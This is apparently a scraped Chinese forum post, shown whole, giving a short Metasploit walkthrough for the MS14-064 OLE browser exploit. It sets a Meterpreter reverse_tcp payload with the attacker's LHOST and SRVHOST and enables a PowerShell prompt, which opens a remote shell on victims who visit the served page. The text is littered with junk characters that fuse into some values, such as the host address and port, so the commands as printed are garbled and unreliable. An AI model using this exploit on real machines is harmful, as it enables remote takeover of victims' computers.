' }; T( Z& D4 ~) ~- E* z
我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示
# H. H2 k7 n$ C8 t/ j
4 Z% z$ ]8 F3 t. _3 Y, M: _2 A% a! t! J) s! j
开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图:
9 z& \& r- N0 s- n; E0 |2 l. [
9 o9 v1 {( [$ X0 `# K; A- I# G* v+ U* j& Q: d/ j U. M
然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp
, {8 v- p: p! e! [- q
`5 t. Z D0 m
* {6 m) v, v$ w v9 x8 i; W2 } set AllowPowershellPrompt true
3 W Z; u8 t7 j/ L( V' E9 K- i
9 d& G$ r8 |* w# d# x& G }/ ^! g: K& d: x# }
Set LHOST 192.168.0.109( \; e: e: \3 l5 v2 N
. T9 ~) R0 |- C/ f }3 J% k5 i
% }* c# [! z- s; [3 Y" K set SRVHOST 192.168.0.1093 V* D8 F5 B% C6 v; V1 R- S! I
+ u) w4 `* b2 b4 O
! Q1 A, \- e U w' c0 R% u Set uripath share/ ?% y4 n- }7 c" \+ V3 U* }% z
* y1 o6 P6 o. x. k$ @% X% k
; `, Q( T% i8 [9 p8 S Set srvport 800 ^! ~0 ^; [6 c. U6 v5 C; v v) C
B3 y2 q& Y$ Q: Z* G) B' f4 d- n7 ]* j, W1 b7 ?* ^
% I7 ]+ z ~6 V# O9 b2 d% D
0 `! Z/ K+ {( ]
) ?9 b+ h1 M' d! ]# Q: l
# y2 J: O# n& Y) ~+ u. U' H
. t) h+ X/ |% ~
4 c& q7 Q% b% R. f {# K
( d! A# @( c+ P" o2 V
0 ]! h9 k" e( O' K. h
# ^, C9 S$ b& i: a. Q# @ * Y. X+ l* P% k: A% E9 z
" W7 w$ P) c) E5 U& {( S
& o& n" D1 }4 t. _3 [- W
. r% E, |$ e5 j) w' [0 B z: \
* ]. [! q a; `2 V
" C C6 }8 z+ S 下面我们来访问本地地址如图: ~) M, `2 ~ C$ z
$ O! l! t( f* A7 m3 H7 H. i2 ^ ^$ j4 }* |0 V
( d8 ~( i& a. y# k
k' f4 @* M- w' N3 u# N% p
. ^, H- ^# i$ t2 F$ w' D 9 C$ g- \" A) O: m% p
; E0 d! F( X' E4 b, b o
8 N9 T$ y1 p! f; n% H; M* s
! \" j& ?* t% H* F! e